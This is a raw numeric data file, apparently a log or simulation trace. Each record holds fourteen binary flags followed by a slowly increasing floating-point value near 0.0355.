0,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5355508e-02 0,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5355532e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355540e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355556e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355584e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355608e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355636e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355660e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355684e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355708e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355732e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355756e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355836e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355860e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355880e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355940e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5355960e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5355984e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356004e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356064e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356084e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356108e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356132e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356156e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356176e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356220e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356244e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356268e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356288e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356308e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356368e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356388e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356412e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356476e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356496e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356516e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356540e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356564e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356588e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356608e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356632e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356652e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356676e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356700e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356724e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356744e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356788e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356812e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356836e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356856e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356876e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356900e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356924e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356948e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5356968e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5356988e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357012e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357036e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357060e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357080e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357104e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357224e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357248e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357276e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357296e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357372e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357396e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357424e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357448e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357476e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357500e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357524e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357548e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357572e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357596e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357624e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357648e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357676e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357700e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357724e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357748e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357772e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357796e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357824e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357848e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357876e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357900e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357924e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357948e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5357972e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5357996e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358028e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358048e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358076e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358100e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358124e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358148e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358172e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358196e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358224e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358248e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358276e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358300e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358324e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358348e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358376e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358400e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358428e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358452e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358476e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358500e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358528e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358556e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358580e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358604e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358628e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358656e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358676e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358704e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358728e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358756e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358780e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358804e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358828e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358852e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358876e-02 0,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5358904e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5358928e-02 0,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5483404e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5483652e-02 1,0,1,1,1,0,0,0,0,0,0,1,0,1,3.5483676e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5483704e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5483988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5484012e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5484020e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,3.5484064e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5484088e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5484096e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,1,3.5484116e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5484140e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5484144e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,1,3.5484188e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,1,3.5484212e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,1,3.5484220e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484236e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484264e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484268e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5484316e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484348e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484364e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484388e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484396e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5484440e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484464e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5484468e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484472e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484636e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484664e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484668e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5484716e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484748e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484764e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484788e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484796e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5484840e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5484864e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5484868e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484872e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484888e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5484964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5484988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485036e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485064e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485068e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5485116e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485148e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485164e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485188e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485196e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5485240e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485264e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5485268e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485272e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485288e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485464e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485468e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5485516e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485548e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485564e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485588e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485612e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485636e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485664e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485688e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485716e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485740e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485764e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485788e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485812e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485836e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485844e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5485892e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5485916e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5485920e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485924e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5485964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5485988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486012e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486020e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5486064e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486088e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486096e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486116e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486140e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486164e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486188e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486212e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486236e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486264e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486288e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486316e-02 1,0,1,1,1,0,0,0,0,1,0,0,0,0,3.5486340e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486344e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5486388e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486412e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486420e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486612e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486620e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5486664e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486688e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486696e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486716e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486740e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486744e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5486788e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5486812e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486820e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486864e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486888e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5486940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5486964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487012e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487036e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5487044e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5487092e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5487116e-02 1,0,1,1,1,1,0,0,0,0,0,0,0,0,3.5487120e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487124e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487164e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487188e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487212e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487236e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487264e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487288e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5487292e-02 1,0,1,1,1,1,0,0,0,1,0,0,1,0,3.5487340e-02 1,0,1,1,1,1,0,0,0,1,0,0,0,0,3.5487364e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487372e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487636e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487688e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487836e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487888e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5487964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5487988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488036e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488088e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488236e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488288e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488636e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488688e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488836e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488888e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5488964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5488988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489036e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489088e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489188e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489212e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489236e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489264e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489288e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489316e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489340e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489364e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489388e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489412e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489436e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489464e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489488e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489516e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489540e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489564e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489588e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489612e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489636e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489664e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489688e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489716e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489740e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489764e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489788e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489812e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489836e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489864e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489888e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489916e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489940e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5489964e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5489988e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490012e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490036e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490064e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490088e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490116e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490140e-02 1,0,1,1,1,0,0,0,0,0,0,0,0,0,3.5490164e-02 1,0,1,1,1,0,0,0,0,0,0,0,1,0,3.5490188e-02 